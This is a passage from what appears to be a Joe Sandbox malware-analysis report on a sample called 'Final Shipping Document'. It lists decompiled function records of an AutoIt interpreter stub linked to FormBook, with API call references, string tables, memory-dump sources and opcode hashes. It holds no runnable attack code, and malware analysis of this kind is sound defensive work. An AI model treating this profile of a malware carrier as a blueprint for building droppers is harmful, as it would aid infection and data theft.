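Run over the record above, the decoded dwType sequence is REG_SZ, REG_MULTI_SZ, REG_QWORD, REG_BINARY, which matches the string table of the same record (REG_SZ, REG_EXPAND_SZ, REG_MULTI_SZ, REG_QWORD, REG_BINARY, REG_DWORD) and supports reading this function as the AutoIt RegWrite dispatcher rather than as malware-specific persistence logic; the FormBook behaviour flagged in the report lives in the injected payload, not in this interpreter stub.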
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?), ref: 00C309C6
                                                            • _wcslen.LIBCMT ref: 00C30A01
                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C30A54
                                                            • _wcslen.LIBCMT ref: 00C30A8A
                                                            • _wcslen.LIBCMT ref: 00C30B06
                                                            • _wcslen.LIBCMT ref: 00C30B81
                                                              • Part of subcall function 00BBF9F2: _wcslen.LIBCMT ref: 00BBF9FD
                                                              • Part of subcall function 00C02BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C02BFA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$MessageSend$BuffCharUpper
                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                            • API String ID: 1103490817-4258414348
                                                            • Opcode ID: 5b9b73527012c06a2f3cabc3145765cb39f9a467f54cdd3a8ed3fdad194766c1
                                                            • Instruction ID: b028082f003ceba19b6eb18301c30a7a76288cf39846e790836cec07c3be7201
                                                            • Opcode Fuzzy Hash: 5b9b73527012c06a2f3cabc3145765cb39f9a467f54cdd3a8ed3fdad194766c1
                                                            • Instruction Fuzzy Hash: 93E1B4322183018FC714DF25C4A196AB7E1FF95718F24499DF8A69B3A2D731EE45CB81
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$BuffCharUpper
                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                            • API String ID: 1256254125-909552448
                                                            • Opcode ID: 5d5fee430420bec35822f1e92f4ad70b6a4f1f4d1c5e7b7705f71f4e70825798
                                                            • Instruction ID: b85f112ac694170af4ec1ec6d433e4d957815dc81f0e916352fac53878c2b00e
                                                            • Opcode Fuzzy Hash: 5d5fee430420bec35822f1e92f4ad70b6a4f1f4d1c5e7b7705f71f4e70825798
                                                            • Instruction Fuzzy Hash: F071043261413A8BCF20DE7CEDD16BE3391AF61794B250628F87697684EA71CF44D3A0
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00C3835A
                                                            • _wcslen.LIBCMT ref: 00C3836E
                                                            • _wcslen.LIBCMT ref: 00C38391
                                                            • _wcslen.LIBCMT ref: 00C383B4
                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00C383F2
                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00C35BF2), ref: 00C3844E
                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C38487
                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00C384CA
                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C38501
                                                            • FreeLibrary.KERNEL32(?), ref: 00C3850D
                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C3851D
                                                            • DestroyIcon.USER32(?,?,?,?,?,00C35BF2), ref: 00C3852C
                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00C38549
                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00C38555
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                            • String ID: .dll$.exe$.icl
                                                            • API String ID: 799131459-1154884017
                                                            • Opcode ID: a4a859d1e5bb8a2a18656546bf5ced81b4b8318f106733223a9bc22291616931
                                                            • Instruction ID: 7c765b7232646c0b24710d88715358efab5287636242f9de66bd07d82b2ce650
                                                            • Opcode Fuzzy Hash: a4a859d1e5bb8a2a18656546bf5ced81b4b8318f106733223a9bc22291616931
                                                            • Instruction Fuzzy Hash: B061F072524315BEEB14DF64CC81FBE77A8FB08711F104649F825E61D1DBB4AA88CBA0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                            • API String ID: 0-1645009161
                                                            • Opcode ID: 0de7731c00efe36f7fc78320688a5b4fe76752923bde860cc59801c49c0f972d
                                                            • Instruction ID: 2805e287fdf04938fd2144047bff4de9e001ad9038c152a334958bbe031baf60
                                                            • Opcode Fuzzy Hash: 0de7731c00efe36f7fc78320688a5b4fe76752923bde860cc59801c49c0f972d
                                                            • Instruction Fuzzy Hash: 9381C671A58605BBDB20AF61DC82FBE37E8EF16300F0440A5F905AA192EF70DE11D7A1
                                                            APIs
                                                            • LoadIconW.USER32(00000063), ref: 00C05A2E
                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00C05A40
                                                            • SetWindowTextW.USER32(?,?), ref: 00C05A57
                                                            • GetDlgItem.USER32(?,000003EA), ref: 00C05A6C
                                                            • SetWindowTextW.USER32(00000000,?), ref: 00C05A72
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00C05A82
                                                            • SetWindowTextW.USER32(00000000,?), ref: 00C05A88
                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00C05AA9
                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00C05AC3
                                                            • GetWindowRect.USER32(?,?), ref: 00C05ACC
                                                            • _wcslen.LIBCMT ref: 00C05B33
                                                            • SetWindowTextW.USER32(?,?), ref: 00C05B6F
                                                            • GetDesktopWindow.USER32 ref: 00C05B75
                                                            • GetWindowRect.USER32(00000000), ref: 00C05B7C
                                                            • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00C05BD3
                                                            • GetClientRect.USER32(?,?), ref: 00C05BE0
                                                            • PostMessageW.USER32(?,00000005,00000000,?), ref: 00C05C05
                                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00C05C2F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                            • String ID:
                                                            • API String ID: 895679908-0
                                                            • Opcode ID: 87234de1aedc3e52df1c688288e017486de760ab6dc99006af9358d6204935c5
                                                            • Instruction ID: 22487894bf3272f3d08bf58a37f36066a0a69083b17a66c0c77b9e7c07cb6817
                                                            • Opcode Fuzzy Hash: 87234de1aedc3e52df1c688288e017486de760ab6dc99006af9358d6204935c5
                                                            • Instruction Fuzzy Hash: 72713A31A00B09AFDB20DFA9CE86BAFBBF5FF48704F104518E556A25A0D775AA44CF50
                                                            APIs
                                                            • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00BC00C6
                                                              • Part of subcall function 00BC00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00C7070C,00000FA0,1A6B96DF,?,?,?,?,00BE23B3,000000FF), ref: 00BC011C
                                                              • Part of subcall function 00BC00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00BE23B3,000000FF), ref: 00BC0127
                                                              • Part of subcall function 00BC00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00BE23B3,000000FF), ref: 00BC0138
                                                              • Part of subcall function 00BC00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00BC014E
                                                              • Part of subcall function 00BC00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00BC015C
                                                              • Part of subcall function 00BC00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00BC016A
                                                              • Part of subcall function 00BC00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00BC0195
                                                              • Part of subcall function 00BC00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00BC01A0
                                                            • ___scrt_fastfail.LIBCMT ref: 00BC00E7
                                                              • Part of subcall function 00BC00A3: __onexit.LIBCMT ref: 00BC00A9
                                                            Strings
                                                            • WakeAllConditionVariable, xrefs: 00BC0162
                                                            • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00BC0122
                                                            • InitializeConditionVariable, xrefs: 00BC0148
                                                            • kernel32.dll, xrefs: 00BC0133
                                                            • SleepConditionVariableCS, xrefs: 00BC0154
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                            • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                            • API String ID: 66158676-1714406822
                                                            • Opcode ID: 8289751aa575cb93679fd19d55f7cfdb1f71970195cc3767b28e608bf5e72035
                                                            • Instruction ID: 078f16327c306fc38f25063f32f91889545f026190e70dfff4a8e25df0195acb
                                                            • Opcode Fuzzy Hash: 8289751aa575cb93679fd19d55f7cfdb1f71970195cc3767b28e608bf5e72035
                                                            • Instruction Fuzzy Hash: 7321A132A64711EBE7116BA4AC4AF7EB3E4EB05B61F14457DF805B22A1DBB49C009B90
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                            • API String ID: 176396367-1603158881
                                                            • Opcode ID: d0de0ffb0cbafa89d54305b8b151b1311e34c73fb4ce45a86e869b2c480a833b
                                                            • Instruction ID: 7437df278c1d476c453296e9fca6745ebed2e662c1f650c28996565447c6ba53
                                                            • Opcode Fuzzy Hash: d0de0ffb0cbafa89d54305b8b151b1311e34c73fb4ce45a86e869b2c480a833b
                                                            • Instruction Fuzzy Hash: 35E1D731A00566ABCF249FA4C891BEDBBB8BF54710F648169E466B72D0DB30AF45C790
                                                            APIs
                                                            • CharLowerBuffW.USER32(00000000,00000000,00C3CC08), ref: 00C14527
                                                            • _wcslen.LIBCMT ref: 00C1453B
                                                            • _wcslen.LIBCMT ref: 00C14599
                                                            • _wcslen.LIBCMT ref: 00C145F4
                                                            • _wcslen.LIBCMT ref: 00C1463F
                                                            • _wcslen.LIBCMT ref: 00C146A7
                                                              • Part of subcall function 00BBF9F2: _wcslen.LIBCMT ref: 00BBF9FD
                                                            • GetDriveTypeW.KERNEL32(?,00C66BF0,00000061), ref: 00C14743
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$BuffCharDriveLowerType
                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                            • API String ID: 2055661098-1000479233
                                                            • Opcode ID: 0cb67a1790e02684abfb5a829f695a1436afde423ad9b8534b640b8626155702
                                                            • Instruction ID: 86ae4e705645a4700cf6cc3a452d3499ad294ea956a759fd78b421093dd27b6a
                                                            • Opcode Fuzzy Hash: 0cb67a1790e02684abfb5a829f695a1436afde423ad9b8534b640b8626155702
                                                            • Instruction Fuzzy Hash: 7AB1E3716083029FC718DF28C890AAEB7E5AFA7764F50491DF4A6C7291D730DA84DB92
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00C2B198
                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C2B1B0
                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C2B1D4
                                                            • _wcslen.LIBCMT ref: 00C2B200
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C2B214
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C2B236
                                                            • _wcslen.LIBCMT ref: 00C2B332
                                                              • Part of subcall function 00C105A7: GetStdHandle.KERNEL32(000000F6), ref: 00C105C6
                                                            • _wcslen.LIBCMT ref: 00C2B34B
                                                            • _wcslen.LIBCMT ref: 00C2B366
                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C2B3B6
                                                            • GetLastError.KERNEL32(00000000), ref: 00C2B407
                                                            • CloseHandle.KERNEL32(?), ref: 00C2B439
                                                            • CloseHandle.KERNEL32(00000000), ref: 00C2B44A
                                                            • CloseHandle.KERNEL32(00000000), ref: 00C2B45C
                                                            • CloseHandle.KERNEL32(00000000), ref: 00C2B46E
                                                            • CloseHandle.KERNEL32(?), ref: 00C2B4E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 2178637699-0
                                                            • Opcode ID: 561fac745eed64d084ac4b917bce29e9e78ba131f06c8f8e854ed4c29c40539c
                                                            • Instruction ID: c38bfcd62e1858ffa6c49f6607251937f2b22ecb3598d53c8d08e97351ce09b1
                                                            • Opcode Fuzzy Hash: 561fac745eed64d084ac4b917bce29e9e78ba131f06c8f8e854ed4c29c40539c
                                                            • Instruction Fuzzy Hash: 2CF1AD71608310DFC714EF24D891B6EBBE1AF85310F18859DF8A99B2A2DB71ED44CB52
                                                            APIs
                                                            • GetMenuItemCount.USER32(00C71990), ref: 00BE2F8D
                                                            • GetMenuItemCount.USER32(00C71990), ref: 00BE303D
                                                            • GetCursorPos.USER32(?), ref: 00BE3081
                                                            • SetForegroundWindow.USER32(00000000), ref: 00BE308A
                                                            • TrackPopupMenuEx.USER32(00C71990,00000000,?,00000000,00000000,00000000), ref: 00BE309D
                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00BE30A9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                            • String ID: 0
                                                            • API String ID: 36266755-4108050209
                                                            • Opcode ID: 0687da9bcac0de0843858e06cbb97c22fe451af00b0ae5cef704149b0c22a6d7
                                                            • Instruction ID: fe53a2c25614156acc7c4bf2ee98a479f51a56ce45ac803f978f78ca07143f34
                                                            • Opcode Fuzzy Hash: 0687da9bcac0de0843858e06cbb97c22fe451af00b0ae5cef704149b0c22a6d7
                                                            • Instruction Fuzzy Hash: 86713531644255BEEB218F25CC89FAEBFE8FF01724F244256F5246A1E0C7B1AD50DB90
                                                            APIs
                                                            • DestroyWindow.USER32(?,?), ref: 00C36DEB
                                                              • Part of subcall function 00BA6B57: _wcslen.LIBCMT ref: 00BA6B6A
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00C36E5F
                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00C36E81
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C36E94
                                                            • DestroyWindow.USER32(?), ref: 00C36EB5
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00BA0000,00000000), ref: 00C36EE4
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C36EFD
                                                            • GetDesktopWindow.USER32 ref: 00C36F16
                                                            • GetWindowRect.USER32(00000000), ref: 00C36F1D
                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C36F35
                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00C36F4D
                                                              • Part of subcall function 00BB9944: GetWindowLongW.USER32(?,000000EB), ref: 00BB9952
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                            • String ID: 0$tooltips_class32
                                                            • API String ID: 2429346358-3619404913
                                                            • Opcode ID: 820ed37793fa7ddc9e5bcb9a55b26bd82511829509e0f38df52e62aec125d10f
                                                            • Instruction ID: ecb4a264474a3836ede353bf3ba75e39bb479f5bdce105510deda89ddfe3d88c
                                                            • Opcode Fuzzy Hash: 820ed37793fa7ddc9e5bcb9a55b26bd82511829509e0f38df52e62aec125d10f
                                                            • Instruction Fuzzy Hash: 38718B74114240AFDB21CF18DC84FAABBF9FB89304F04441DFA9997260C770EA4ACB21
                                                            APIs
                                                              • Part of subcall function 00BB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB9BB2
                                                            • DragQueryPoint.SHELL32(?,?), ref: 00C39147
                                                              • Part of subcall function 00C37674: ClientToScreen.USER32(?,?), ref: 00C3769A
                                                              • Part of subcall function 00C37674: GetWindowRect.USER32(?,?), ref: 00C37710
                                                              • Part of subcall function 00C37674: PtInRect.USER32(?,?,00C38B89), ref: 00C37720
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00C391B0
                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00C391BB
                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00C391DE
                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00C39225
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00C3923E
                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00C39255
                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00C39277
                                                            • DragFinish.SHELL32(?), ref: 00C3927E
                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00C39371
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                            • API String ID: 221274066-3440237614
                                                            • Opcode ID: 24491be41074af962b8a24d1ca5a8419c8d0dfdfb997eec07551ecb23728d72c
                                                            • Instruction ID: f2e9c7c490e031dbe03e20d206f658ee4b401ecc3f93a3e6d10b8135ad25e598
                                                            • Opcode Fuzzy Hash: 24491be41074af962b8a24d1ca5a8419c8d0dfdfb997eec07551ecb23728d72c
                                                            • Instruction Fuzzy Hash: 60616B71108301AFD701EF64DC85EAFBBF8EF89750F004A6DF595922A1DB709A49CB52
                                                            APIs
                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C1C4B0
                                                            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00C1C4C3
                                                            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00C1C4D7
                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00C1C4F0
                                                            • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00C1C533
                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00C1C549
                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C1C554
                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C1C584
                                                            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00C1C5DC
                                                            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00C1C5F0
                                                            • InternetCloseHandle.WININET(00000000), ref: 00C1C5FB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
